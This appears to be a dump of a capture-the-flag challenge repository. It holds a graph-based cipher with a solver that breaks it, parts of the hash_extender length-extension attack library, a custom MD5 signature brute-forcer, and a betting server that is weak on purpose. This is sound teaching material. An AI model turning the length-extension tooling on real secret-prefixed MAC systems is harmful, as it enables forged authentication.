├── crypto ├── graphs │ ├── ciphertext │ ├── genkey.py │ ├── mserrano_sol.py │ └── pubkey ├── parlor │ ├── README │ ├── hash_extender │ │ ├── .gitignore │ │ ├── .poop.c.swp │ │ ├── LICENSE.txt │ │ ├── Makefile │ │ ├── README.html │ │ ├── buffer.c │ │ ├── buffer.h │ │ ├── formats.c │ │ ├── formats.h │ │ ├── hash_extender.CCC │ │ ├── hash_extender_engine.c │ │ ├── hash_extender_engine.h │ │ ├── hash_extender_test.c │ │ ├── poop │ │ ├── poop.c │ │ ├── test.c │ │ ├── test.h │ │ ├── util.c │ │ └── util.h │ ├── mserrano_sol.py │ └── server.py ├── twenty │ ├── gen.py │ ├── plaintext │ └── twenty.txt └── wheeeeeeeeeeeeeeeeeeeeeee │ ├── check │ ├── check.c │ ├── cimpl │ ├── cimpl.c │ ├── reimpl2.h │ ├── server.py │ ├── solutions │ └── mserrano │ │ ├── csol │ │ ├── csol.c │ │ ├── example_run.txt │ │ ├── reimpl2.h │ │ └── solution.py │ └── wheeeee.py ├── forensics ├── curlcore │ ├── curlcore.sh │ ├── makepem.sh │ └── sslserve.py └── rsa │ ├── README │ ├── corrupted.pem │ ├── encrypted │ ├── key │ ├── public.pub │ └── reconstruct_pem.py ├── pwnables ├── __nightmares__ │ └── nightmares.py ├── ezhp │ ├── Makefile │ ├── ezhp │ └── ezhp.c ├── harry_potter │ ├── Makefile │ ├── SHA256.cpp │ ├── SHA256.h │ ├── aes256.c │ ├── aes256.h │ ├── except │ └── except.cpp ├── jackshit │ ├── Makefile │ └── main.c ├── kappa │ ├── Makefile │ ├── art.h │ └── kappa.c ├── sass │ ├── Makefile │ └── sass.c └── tenement │ ├── Makefile │ └── tenement.c ├── reversing ├── g++ │ ├── .gitignore │ ├── Makefile │ ├── g++-30f6a74ce24ea3605ba7cbec92222a72.tar.bz │ ├── key │ ├── solution │ │ └── ryan.c │ └── solveme.cpp ├── gcc │ └── gimplify.c.diff ├── hudak │ ├── KEY.txt │ ├── Makefile │ ├── hudak │ ├── hudak-c3c6dd04f699cc01c0d4f547f2155ddf.tar.bz2 │ └── lazy.c └── tiffany │ ├── FLAGE │ ├── braces.txt │ ├── build_dfas.py │ ├── length32.txt │ ├── my.txt │ ├── pt.c │ ├── skills.txt │ ├── solutions │ └── ryan.py │ ├── suck.txt │ ├── synchronization.txt │ ├── tiffany │ ├── tiffany-0233a625fc40b2dda9c31781a0dbb46e.tar.bz2 │ └── underscores.txt └── web ├── bronies ├── bigson │ ├── bigson │ └── bigson.cc ├── bronies_site │ ├── cat.jpg │ ├── data │ │ ├── .htaccess │ │ ├── do_xss.py │ │ ├── imgs │ │ │ ├── Apple Bloom.png │ │ │ ├── Applejack.png │ │ │ ├── Babs Seed.png │ │ │ ├── Big McIntosh.png │ │ │ ├── Diamond Tiara.png │ │ │ ├── Fluttershy.png │ │ │ ├── Pinky Pie.png │ │ │ ├── Princess Celestia.png │ │ │ ├── Rainbow Dash.png │ │ │ ├── Rarity.png │ │ │ ├── Scootaloo.png │ │ │ ├── Silver Spoon.png │ │ │ ├── Sweetie Belle.png │ │ │ ├── Twilight Sparkle.png │ │ │ └── Twist.png │ │ ├── login │ │ ├── logout │ │ ├── main │ │ └── msgs │ ├── default.css │ ├── head.php │ ├── img.php │ ├── index.php │ ├── logo.png │ └── mlp.jpg ├── login │ ├── checkotp.c │ └── www │ │ ├── checkotp │ │ ├── index.php │ │ ├── login.php │ │ ├── logout.php │ │ └── style.css ├── solution │ ├── exp.html │ ├── exp.js │ └── xss.html └── victim │ └── victim.py ├── halphow2js ├── index.html ├── mkcert.sh ├── script.js ├── server_cache.js └── server_flag.js ├── heartbleed └── Makefile ├── kPOP ├── README ├── add_song.php ├── classes.php ├── data.php ├── db.sql ├── export.php ├── flag ├── import.php ├── index.php ├── song.php └── songs.php ├── mtpox ├── about ├── admin.php ├── create.sql ├── index ├── index.php ├── pysha256.py ├── secrets.php ├── solver.py └── static │ ├── css │ ├── bootstrap.css │ ├── bootstrap.min.css │ └── style.css │ └── js │ ├── bootstrap.js │ ├── bootstrap.min.js │ └── jquery.min.js ├── reekee ├── distribute_me │ ├── font.ttf │ ├── manage.py │ ├── mymeme │ │ ├── __init__.py │ │ ├── settings.py │ │ ├── urls.py │ │ ├── views.py │ │ └── wsgi.py │ └── templates │ │ ├── head.html │ │ ├── index.html │ │ ├── login.html │ │ ├── make.html │ │ ├── register.html │ │ └── view.html ├── give_me_the_flag.exe.c ├── mymeme │ ├── db.sqlite3 │ ├── font.ttf │ ├── manage.py │ ├── mymeme │ │ ├── __init__.py │ │ ├── settings.py │ │ ├── urls.py │ │ ├── views.py │ │ └── wsgi.py │ └── templates │ │ ├── head.html │ │ ├── index.html │ │ ├── login.html │ │ ├── make.html │ │ ├── register.html │ │ └── view.html ├── solver.py └── use_exe_to_read_me.txt └── whatscat ├── README ├── database.sql ├── solver.sh └── to_host ├── cat ├── cat.jpg ├── default.css ├── foot.php ├── head.php ├── imgs ├── cat1.jpg ├── cat2.jpg ├── cat3.jpg ├── cat4.jpg ├── dog1.jpg ├── lion.jpg └── trex.jpg ├── index.php ├── login ├── logo.png ├── logout └── main /crypto/graphs/genkey.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os,random,math,pickle,zlib 4 | 5 | ''' 6 | Encrypts a message using super secure, NP-hard graph stuff. 7 | 8 | Encryption works like this: take a graph, split your message up into 9 | N numbers, such that the sum of all the numbers is equal to your message. 10 | Assign each vertex to one of these N numbers. 11 | 12 | Then ciphertext[v] is the sum of v's N, and all of the N's from v's neighbors 13 | ''' 14 | 15 | class Graphcrypt: 16 | def __init__(self,fil=None,pubkey=None,privkey=None,keylen=None): 17 | if fil is not None: 18 | c = ''.join(open(fil).read().split("\n")[1:-1]).decode("base64") 19 | key = pickle.loads(zlib.decompress(c)) 20 | if 'pub' in key: 21 | self.pubkey = key['pub'] 22 | self.keylen = len(self.pubkey) 23 | elif 'priv' in key: 24 | self.pubkey = key['priv'].pubkey 25 | self.privkey = key['priv'].privkey 26 | self.keylen = key['priv'].keylen 27 | elif (pubkey == None) and (privkey == None): 28 | if keylen is None: 29 | self.keylen = 1024 30 | self.new() 31 | else: 32 | if (pubkey is None): 33 | raise Exception('u need a pub key, dawg') 34 | self.pubkey = pubkey 35 | self.keylen = len(self.pubkey) 36 | self.privkey = privkey 37 | 38 | def new(self): 39 | random.seed(os.urandom(self.keylen>>3)) #get some tasty randomness 40 | 41 | #use this to generate a random graph 42 | vertices = range(self.keylen) 43 | privkey = random.sample(vertices,self.keylen>>4) 44 | 45 | tocover = set(vertices).difference(set(privkey)) 46 | 47 | G = [0]*self.keylen 48 | for v in vertices: 49 | G[v] = [] 50 | 51 | while len(tocover) > 0: 52 | src = random.choice(privkey) 53 | dst = random.choice(list(tocover)) 54 | G[src].append(dst) 55 | G[dst].append(src) 56 | tocover = tocover.difference(set([dst])) 57 | 58 | others = list(set(vertices).difference(set(privkey))) 59 | for o in others: 60 | for n in others: 61 | if random.getrandbits(5) == 0: 62 | if o not in G[n]: 63 | G[n].append(o) 64 | G[o].append(n) 65 | self.privkey = privkey 66 | self.pubkey = G 67 | 68 | def encrypt(self,message): 69 | t = message/self.keylen 70 | vals = [int(random.gauss(t,t)) for _ in xrange(self.keylen-1)] 71 | missing = message - reduce(lambda a,b:a+b, vals) 72 | vals.append(missing) 73 | assert(reduce(lambda a,b:a+b, vals) == message) 74 | 75 | ctext = [0] * self.keylen 76 | for v in xrange(self.keylen): 77 | ctext[v] = vals[v] 78 | for n in self.pubkey[v]: 79 | ctext[v] += vals[n] 80 | return zlib.compress(pickle.dumps(ctext),9).encode("base64") 81 | 82 | def decrypt(self,ct): 83 | if self.privkey == None: 84 | raise Exception('lol u dont hav a private key how u decrypt') 85 | ct = pickle.loads(zlib.decompress(ct.decode("base64"))) 86 | return reduce(lambda a,b:a+b,[ct[i] for i in self.privkey]) 87 | 88 | def exportpub(self,fil): 89 | s = "-----BEGIN GRAPHCRYPT PUBLIC KEY-----\n" 90 | s += zlib.compress(pickle.dumps({'pub':self.pubkey}),9).encode("base64") 91 | s += "-----END GRAPHCRYPT PUBLIC KEY-----\n" 92 | open(fil,'w').write(s) 93 | 94 | def exportpriv(self,fil): 95 | s = "-----BEGIN GRAPHCRYPT PRIVATE KEY-----\n" 96 | s += zlib.compress(pickle.dumps({'priv':self}),9).encode("base64") 97 | s += "-----END GRAPHCRYPT PRIVATE KEY-----\n" 98 | open(fil,'w').write(s) -------------------------------------------------------------------------------- /crypto/graphs/mserrano_sol.py: -------------------------------------------------------------------------------- 1 | from pulp import * 2 | import os,random,math,pickle,zlib 3 | 4 | c = ''.join(open("pubkey").read().split("\n")[1:-1]).decode("base64") 5 | # c is a graph. 6 | g = pickle.loads(zlib.decompress(c)) 7 | # g is now a graph 8 | g = g['pub'] 9 | N = len(g) 10 | vs = [] 11 | us = [] 12 | prob = LpProblem("myProblem", LpMinimize) 13 | for x in xrange(N): 14 | vs.append(LpVariable("v"+str(x), 0, 1)) 15 | for x in xrange(N): 16 | # we know its neighbors. 17 | l = g[x] 18 | prob += (lpSum([vs[z] for z in l] + [vs[x]]) >= 1) 19 | prob += lpSum(vs) 20 | print "Problem set up. Solving..." 21 | status = prob.solve(GLPK(msg=0)) 22 | print "Solved." 23 | lst = [] 24 | for x in xrange(N): 25 | if value(vs[x]) > 0: 26 | lst.append(x) 27 | print lst 28 | ct = open("ciphertext").read() 29 | ct = pickle.loads(zlib.decompress(ct.decode("base64"))) 30 | msg = reduce(lambda a,b:a+b, [ct[i] for i in lst]) 31 | print hex(int(msg)).strip('L').strip('0x').decode('hex') 32 | -------------------------------------------------------------------------------- /crypto/parlor/README: -------------------------------------------------------------------------------- 1 | A simple betting game. 2 | 3 | User connects and the server and a "session" starts. The server generates a 4 | nonce for the session, and asks the user to input their own nonce. The server 5 | requests the odds the user wants and then the user's guess. If 6 | sha1(server_nonce+user_nonce)%odds == user_guess, they win. 7 | 8 | To verify the server isn't cheating, the user can request for the server_nonce 9 | to be displayed, which will also reset the server_nonce to something else. 10 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/.gitignore: -------------------------------------------------------------------------------- 1 | # ignore objects and archives, anywhere in the tree. 2 | *.[oa] 3 | *.exe 4 | 5 | hash_extender_test 6 | hash_extender 7 | 8 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/.poop.c.swp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/crypto/parlor/hash_extender/.poop.c.swp -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright © 2012 Ron Bowes. All Rights Reserved. 2 | 3 | Redistribution and use in source and binary forms, with or without 4 | modification, are permitted provided that the following conditions are 5 | met: 6 | 7 | 1. Redistributions of source code must retain the above copyright 8 | notice, this list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright 11 | notice, this list of conditions and the following disclaimer in the 12 | documentation and/or other materials provided with the distribution. 13 | 14 | 3. The name of the author may not be used to endorse or promote products 15 | derived from this software without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED BY [LICENSOR] "AS IS" AND ANY EXPRESS OR 18 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 19 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 20 | DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, 21 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 22 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 24 | HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 25 | STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN 26 | ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 27 | POSSIBILITY OF SUCH DAMAGE. 28 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/Makefile: -------------------------------------------------------------------------------- 1 | # Checks if /usr/include/openssl/whrlpool.h exists, and set a define if it 2 | # doesn't. 3 | INCLUDE_OPENSSL := /usr/include/openssl 4 | INCLUDE_WHIRLPOOL := whrlpool.h 5 | ifneq ($(shell ls $(INCLUDE_OPENSSL)/$(INCLUDE_WHIRLPOOL) 2>/dev/null), $(INCLUDE_OPENSSL)/$(INCLUDE_WHIRLPOOL)) 6 | WHIRLPOOL := -DDISABLE_WHIRLPOOL 7 | endif 8 | 9 | # Capture the operating system name for use by the preprocessor. 10 | OS := $(shell uname | tr '/[[:lower:]]' '_[[:upper:]]') 11 | 12 | # These are the specifications of the toolchain 13 | CC := gcc 14 | CFLAGS := -std=c89 -ggdb -O9 -oS -Wall -Werror -Wno-deprecated 15 | CPPFLAGS := -D_BSD_SOURCE -D$(OS) $(WHIRLPOOL) 16 | LDFLAGS := -lssl -lcrypto 17 | 18 | #BIN_MAIN := hash_extender 19 | BIN_MAIN := poop 20 | BIN_TEST := hash_extender_test 21 | BINS := $(BIN_MAIN) $(BIN_TEST) 22 | 23 | SRCS := $(wildcard *.c) 24 | OBJS := $(patsubst %.c,%.o,$(SRCS)) 25 | OBJS_MAIN := $(filter-out $(BIN_TEST).o,$(OBJS)) 26 | OBJS_TEST := $(filter-out $(BIN_MAIN).o,$(OBJS)) 27 | 28 | all: $(BINS) 29 | 30 | $(BIN_MAIN): $(OBJS_MAIN) 31 | @echo [LD] $@ 32 | @$(CC) $(CFLAGS) -o $(BIN_MAIN) $(OBJS_MAIN) $(LDFLAGS) 33 | 34 | $(BIN_TEST): $(OBJS_TEST) 35 | @echo [LD] $@ 36 | @$(CC) $(CFLAGS) -o $(BIN_TEST) $(OBJS_TEST) $(LDFLAGS) 37 | 38 | %.o: %.c 39 | @echo [CC] $@ 40 | @$(CC) $(CFLAGS) $(CPPFLAGS) -c -o $@ $< 41 | 42 | clean: 43 | @echo [RM] \*.o 44 | @rm -f $(OBJS) 45 | @echo [RM] $(BIN_MAIN) 46 | @rm -f $(BIN_MAIN) 47 | @echo [RM] $(BIN_TEST) 48 | @rm -f $(BIN_TEST) 49 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/formats.h: -------------------------------------------------------------------------------- 1 | #ifndef __FORMATS_H__ 2 | #define __FORMATS_H__ 3 | 4 | /* formats.h 5 | * By Ron Bowes 6 | * Created September/2012 7 | * 8 | * See LICENSE.txt 9 | * 10 | * This module implements encoders/decoders of various formats. It was 11 | * originally written for the hash_extender tool, but is generic enough to be 12 | * used elsewhere. 13 | * 14 | * As a programmer, you basically call format_encode() to encode a string in a 15 | * particular format, or format_decode() to convert it back. Both of these 16 | * functions take a string representing the format name, as well as the 17 | * incoming data and length. It returns an allocated string containing the 18 | * encoded or decoded data, and returns the string's length in the final 19 | * argument. Be sure to free() the variable. 20 | * 21 | * A user-readable list of encoders and decoders can be accessed through the 22 | * variables below, and format_exists() can be used to verify whether or not an 23 | * encoder is valid. 24 | * 25 | * If you want to add your own encoder/decoder, it's pretty easy. Add the 26 | * functions to formats.c, update the 'formats' array at the top, and add it to 27 | * the encode_formats/decode_formats string as applicable. That's it! I highly 28 | * recommend using the buffer module to build the strings, so you don't have to 29 | * worry about messing around with building strings by hand. 30 | * 31 | * The formats implemented are: 32 | * - none - output nothing in any case 33 | * - raw - output the string as-is 34 | * - hex - the string is encoded in hexadecimal (eg, "AAA" -> "414141"). This 35 | * is useful for hashes, for instance, which are generally represented this 36 | * way. 37 | * - html - non-alphanumeric characters are encoded in html style and spaces 38 | * are replaced with '+' - eg, '!a %z' -> '%21a+%25z' 39 | * - html-pure - all characters are encoded in html style - eg. 'ABC' -> 40 | * '%41%42%43' 41 | * - cstr - non-alphanumeric characters are encoded in cstring style - eg, '!a 42 | * %z' -> '\x21a\x20\x25z' 43 | * - cstr-pure - all characters are encoded - cstr style - eg. 'ABC' -> 44 | * '\x41\x42\x43' 45 | */ 46 | 47 | #include "util.h" 48 | 49 | /* A comma-separated (and user-readable) list of encoders. */ 50 | extern const char *encode_formats; 51 | 52 | /* A comma-separated (and user-readable) list of decoders. */ 53 | extern const char *decode_formats; 54 | 55 | /* Check if the format exists. */ 56 | bool format_exists(char *format); 57 | 58 | /* Encode the data and return it in a newly allocated string. */ 59 | uint8_t *format_encode(char *format_name, uint8_t *data, uint64_t data_length, uint64_t *out_length); 60 | 61 | /* Decode the data and return it in a newly allocated string. */ 62 | uint8_t *format_decode(char *format_name, uint8_t *data, uint64_t data_length, uint64_t *out_length); 63 | 64 | /* Perform self-tests. */ 65 | void format_test(void); 66 | 67 | #endif 68 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/hash_extender_engine.h: -------------------------------------------------------------------------------- 1 | #ifndef __HASH_EXTENDER_ENGINE_H__ 2 | #define __HASH_EXTENDER_ENGINE_H__ 3 | 4 | /* hash_extender_engine.h 5 | * By Ron Bowes 6 | * Created September/2012 7 | * 8 | * See LICENSE.txt 9 | * 10 | * This module implements a hash length extension attack against a variety of 11 | * hash types, and can easily be modified to accept more. 12 | * 13 | * As a user, there are two functions that really matter: The first is 14 | * hash_append_data(), which appends the requested data to the string in a such 15 | * a way that we can sign it properly (that is, with the padding in between the 16 | * old string and the new string). The second is hash_gen_signature_evil() 17 | * which creates a new signature for the string with the appended data. For 18 | * more information on the nitty gritty details of this attack, have a look at 19 | * README.txt, it explains the attack in full. 20 | * 21 | * Hash types are idenfied by name. You can get a list of names either in 22 | * string format (hash_type_list) or in array format (hash_type_array). You can 23 | * also use hash_type_exists to check if it exists. 24 | * 25 | * One hash type - WHIRLPOOL - doesn't appear to be present in versions of 26 | * OpenSSL until fairly recently. As such, the Makefile detects whether or not 27 | * it exists and automatically disables the WHIRLPOOL support if it doesn't. 28 | * 29 | * Adding new hash types is fairly easy. Add it to the hash_types table at the 30 | * top of hash_extender_engine.c, then implement the required hashing function. 31 | * The hashing function hashes data of a given length, but has two additional 32 | * arguments - state and state_size - which, if populated, are the starting 33 | * state and the amount of data that has already been hashed (respectively). Be 34 | * sure to also add your hash type to hash_type_list and hash_type_array. 35 | */ 36 | 37 | #include "util.h" 38 | 39 | /* The maximum length that any digest can be. */ 40 | #define MAX_DIGEST_LENGTH (512/8) 41 | 42 | /* The total number of hash types (calculated automatically). */ 43 | extern const uint64_t hash_type_count; 44 | 45 | /* A string containing a user-readable list of hash types. */ 46 | extern const char *hash_type_list; 47 | 48 | /* A list of hash types an an array. */ 49 | extern char *hash_type_array[]; 50 | 51 | /* Check whether or not the given hash type exists. */ 52 | bool hash_type_exists(char *hash_type_name); 53 | 54 | /* Basically an accessor method for the hash type's digest size. */ 55 | uint64_t hash_type_digest_size(char *hash_type_name); 56 | 57 | /* Append data to the hash. */ 58 | uint8_t *hash_append_data(char *hash_type_name, uint8_t *data, uint64_t data_length, uint64_t secret_length, uint8_t *append, uint64_t append_length, uint64_t *new_length); 59 | 60 | /* Generate a legit signature for the data - prepend the secret to the data and 61 | * sign it with the appropriate hash. Used primarily for testing. */ 62 | void hash_gen_signature(char *hash_type_name, uint8_t *secret, uint64_t secret_length, uint8_t *data, uint64_t data_length, uint8_t *signature); 63 | 64 | /* Generate a signature for the data based on the appended data and the state 65 | * rather than using the secret. */ 66 | void hash_gen_signature_evil(char *hash_type_name, uint64_t secret_length, uint64_t data_length, uint8_t *original_signature, uint8_t *append, uint64_t append_length, uint8_t *new_signature); 67 | 68 | /* Self-tests. */ 69 | void hash_test(void); 70 | 71 | #endif 72 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/hash_extender_test.c: -------------------------------------------------------------------------------- 1 | #include "formats.h" 2 | #include "hash_extender_engine.h" 3 | #include "test.h" 4 | 5 | int main(void) 6 | { 7 | hash_test(); 8 | format_test(); 9 | test_report(); 10 | 11 | return EXIT_SUCCESS; 12 | } 13 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/poop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/crypto/parlor/hash_extender/poop -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/poop.c: -------------------------------------------------------------------------------- 1 | #include "hash_extender_engine.h" 2 | #include 3 | #include 4 | #include 5 | 6 | #include "buffer.h" 7 | #include "formats.h" 8 | #include "util.h" 9 | #include 10 | 11 | static unsigned int hex2int(char ch){ 12 | if(ch>='0' && ch<='9') return ch-'0'; 13 | if(ch>='a' && ch<='f') return ch-'a'+10; 14 | if(ch>='A' && ch<='F') return ch-'A'+10; 15 | return 0; 16 | } 17 | 18 | int main(int argc, char** argv) { 19 | uint8_t *b = malloc(64); 20 | memset(b,'B',64); 21 | uint8_t *ns = malloc(16); 22 | 23 | uint8_t *hash = calloc(16,1); 24 | unsigned int match = htonl(strtol(argv[2],0,16)); 25 | unsigned int i; 26 | for (i = 0; i < 16; i++) { 27 | hash[i] = (hex2int(argv[1][2*i])<<4) + hex2int(argv[1][1+(2*i)]); 28 | } 29 | for (i = 0; i < 0x10000000; i++) { 30 | *(unsigned int*)&hash[0] &= 0x0f000000; 31 | *(unsigned int*)&hash[0] |= ((i & 0x0f000000)<<4) | (i & 0x00ffffff); 32 | hash_gen_signature_evil("md5",16,48,hash,b,64,ns); 33 | /* printf("%s\n",ns); */ 34 | if (!memcmp(ns+12,(char*)&match,4)) { 35 | printf("%08x\n",htonl(((i & 0x0f000000)<<4) | (i & 0x00ffffff))); 36 | return 1; 37 | } 38 | } 39 | return 0; 40 | } 41 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/test.c: -------------------------------------------------------------------------------- 1 | #include "util.h" 2 | 3 | static int tests_run = 0; 4 | static int tests_passed = 0; 5 | 6 | static void test_passed(void) 7 | { 8 | tests_run++; 9 | tests_passed++; 10 | } 11 | 12 | static void test_failed(void) 13 | { 14 | tests_run++; 15 | } 16 | 17 | void test_check_boolean(char *description, uint8_t passed) 18 | { 19 | if(passed) 20 | { 21 | test_passed(); 22 | } 23 | else 24 | { 25 | test_failed(); 26 | printf("FAIL: %s\n", description); 27 | } 28 | } 29 | 30 | void test_check_memory(char *description, uint8_t *expected, uint64_t expected_length, uint8_t *result, uint64_t result_length) 31 | { 32 | if(expected_length == result_length && !memcmp(expected, result, expected_length)) 33 | { 34 | test_passed(); 35 | } 36 | else 37 | { 38 | test_failed(); 39 | 40 | printf("FAIL: %s\n", description); 41 | printf(" Expected: "); 42 | print_hex(expected, expected_length); 43 | printf(" --> (\"%s\")\n", expected); 44 | 45 | printf(" Result: "); 46 | print_hex(result, result_length); 47 | printf(" --> (\"%s\")\n", result); 48 | 49 | printf("\n"); 50 | } 51 | } 52 | 53 | void test_check_integer(char *description, uint32_t expected, uint32_t result) 54 | { 55 | if(expected == result) 56 | { 57 | test_passed(); 58 | } 59 | else 60 | { 61 | test_failed(); 62 | 63 | printf("FAIL: %s\n", description); 64 | printf(" Expected: 0x%08x\n", expected); 65 | printf(" Result: 0x%08x\n", result); 66 | printf("\n"); 67 | } 68 | } 69 | 70 | void test_report(void) 71 | { 72 | if(tests_run == 0) 73 | { 74 | printf("No tests run!\n"); 75 | } 76 | else 77 | { 78 | printf("--------------------------------------------------------------------------------\n"); 79 | printf("TESTS PASSED: %d / %d [%2.4f%%]\n", tests_passed, tests_run, 100 * (float)tests_passed / tests_run); 80 | printf("--------------------------------------------------------------------------------\n"); 81 | } 82 | } 83 | 84 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/test.h: -------------------------------------------------------------------------------- 1 | #ifndef __TEST_H__ 2 | #define __TEST_H__ 3 | 4 | #include "util.h" 5 | 6 | void test_check_memory(char *description, uint8_t *expected, uint64_t expected_length, uint8_t *result, uint64_t result_length); 7 | void test_check_integer(char *description, uint32_t expected, uint32_t result); 8 | void test_check_boolean(char *description, uint8_t passed); 9 | void test_report(void); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/util.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include "buffer.h" 4 | #include "test.h" 5 | #include "util.h" 6 | 7 | void print_hex(unsigned char *data, unsigned int length) 8 | { 9 | unsigned int i; 10 | 11 | for(i = 0; i < length; i++) 12 | printf("%02x", data[i]); 13 | printf("\n"); 14 | } 15 | 16 | static char get_character_from_byte(uint8_t byte) 17 | { 18 | if(byte < 0x20 || byte > 0x7F) 19 | return '.'; 20 | return byte; 21 | } 22 | 23 | void print_hex_fancy(uint8_t *data, uint64_t length) 24 | { 25 | uint64_t i, j; 26 | 27 | for(i = 0; i < length; i++) 28 | { 29 | if(!(i % 16)) 30 | { 31 | if(i > 0) 32 | { 33 | printf(" "); 34 | for(j = 16; j > 0; j--) 35 | { 36 | printf("%c", get_character_from_byte(data[i - j])); 37 | } 38 | } 39 | printf("\n%04X: ", (int)i); 40 | } 41 | 42 | printf("%02X ", data[i]); 43 | } 44 | 45 | for(i = length % 16; i < 17; i++) 46 | printf(" "); 47 | for(i = length - (length % 16); i < length; i++) 48 | printf("%c", get_character_from_byte(data[i])); 49 | 50 | printf("\nLength: 0x%X (%d)\n", (int)length, (int)length); 51 | } 52 | 53 | void die(char *msg) 54 | { 55 | fprintf(stderr, "FATAL ERROR: %s\n", msg); 56 | exit(EXIT_FAILURE); 57 | } 58 | 59 | void die_MEM(void) 60 | { 61 | die("Out of memory"); 62 | } 63 | 64 | /* Read and return an entire file. */ 65 | uint8_t *read_file(char *filename, uint64_t *out_length) 66 | { 67 | char buffer[1024]; 68 | size_t bytes_read; 69 | buffer_t *b = buffer_create(BO_HOST); 70 | FILE *f = fopen(filename, "rb"); 71 | 72 | if(!f) 73 | die("Couldn't open input file"); 74 | 75 | while((bytes_read = fread(buffer, 1, 1024, f)) != 0) 76 | { 77 | buffer_add_bytes(b, buffer, bytes_read); 78 | } 79 | 80 | return buffer_create_string_and_destroy(b, out_length); 81 | } 82 | -------------------------------------------------------------------------------- /crypto/parlor/hash_extender/util.h: -------------------------------------------------------------------------------- 1 | #ifndef _UTIL_H_ 2 | #define _UTIL_H_ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | void print_hex(unsigned char *data, unsigned int length); 14 | void print_hex_fancy(uint8_t *data, uint64_t length); 15 | void die(char *msg); 16 | void die_MEM(void); 17 | 18 | uint8_t *read_file(char *filename, uint64_t *out_length); 19 | 20 | void util_test(void); 21 | 22 | #endif 23 | -------------------------------------------------------------------------------- /crypto/parlor/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from hashlib import md5 4 | import SocketServer,threading,os 5 | 6 | msg = """/------------------------------------------------------------------------------\\ 7 | | Welcome to the betting parlor! | 8 | | | 9 | | We implement State of the Art cryptography to give you the fairest and most | 10 | | exciting betting experience! | 11 | | | 12 | | Here's how it works: we both pick a nonce, you tell us odds, and you give us | 13 | | some money. | 14 | | If md5(our number + your number) % odds == 0, you win bet amount*odds. | 15 | | Otherwise, we get your money! We're even so nice, we gave you $1000 to start.| 16 | | | 17 | | If you don't trust us, we will generate a new nonce, and reveal the old nonce| 18 | | to you, so you can verify all of our results! | 19 | | | 20 | | (Oh, and if you win a billion dollars, we'll give you a flag.) | 21 | \______________________________________________________________________________/ 22 | """ 23 | 24 | options = """ 25 | ==================== 26 | 1) set your odds 27 | 2) set your bet 28 | 3) play a round 29 | 4) get balance 30 | 5) reveal nonce 31 | 6) quit 32 | ==================== 33 | 34 | """ 35 | 36 | def getn(s): 37 | try: 38 | return int(s.recv(1024)) 39 | except: 40 | return 0 41 | 42 | class threadedserver(SocketServer.ThreadingMixIn, SocketServer.TCPServer): 43 | pass 44 | 45 | class incoming(SocketServer.BaseRequestHandler): 46 | def handle(self): 47 | cur_thread = threading.current_thread() 48 | self.nonce = os.urandom(16) 49 | self.user_nonces = [] 50 | self.monies = 1000 51 | self.bet = 1 52 | self.odds = 1 53 | 54 | self.request.send(msg) 55 | 56 | while True: 57 | if self.monies >= 1000000000: 58 | self.request.send("Holy shit you have a lot of money. Here's a key: XXXXXXXXXXXXXXX\n") 59 | self.request.send(options) 60 | m = getn(self.request) 61 | if m == 1: 62 | self.request.send("Please pick odds (as a power of 2 between 1 and 100): ") 63 | self.odds = min(max(getn(self.request),1),100) 64 | self.request.send("Odds set to 2^%d, good luck!"%self.odds) 65 | elif m == 2: 66 | self.request.send("Please pick your bet amount (between 0 and %d): "%self.monies) 67 | self.bet = min(max(0,getn(self.request)),self.monies) 68 | self.request.send("Alright, bet amount set to $%d, good luck!"%self.bet) 69 | elif m == 3: 70 | self.request.send("Okay, send us a nonce for this round!\n") 71 | self.user_nonces.append(self.request.recv(1024)) 72 | if self.user_nonces[-1] in self.user_nonces[:-1]: 73 | self.request.send("What part of NONCE don't you understand, asshole?\n") 74 | return 0 75 | self.bet = min(self.bet,self.monies) 76 | self.monies -= self.bet 77 | self.request.send("Betting $%d at odds of 2^%d"%(self.bet,self.odds)) 78 | result = int(md5(self.nonce + self.user_nonces[-1]).hexdigest(),16)&((2<<(self.odds-1))-1) 79 | if result == 0: 80 | self.request.send("\nWow! You won, congratulations!") 81 | self.monies += self.bet*(2<<(self.odds-1)) 82 | else: 83 | self.request.send("\nToo bad, we generated %d, not 0... better luck next time!"%result) 84 | elif m == 4: 85 | self.request.send("Your current balance is $%d"%self.monies) 86 | elif m == 5: 87 | 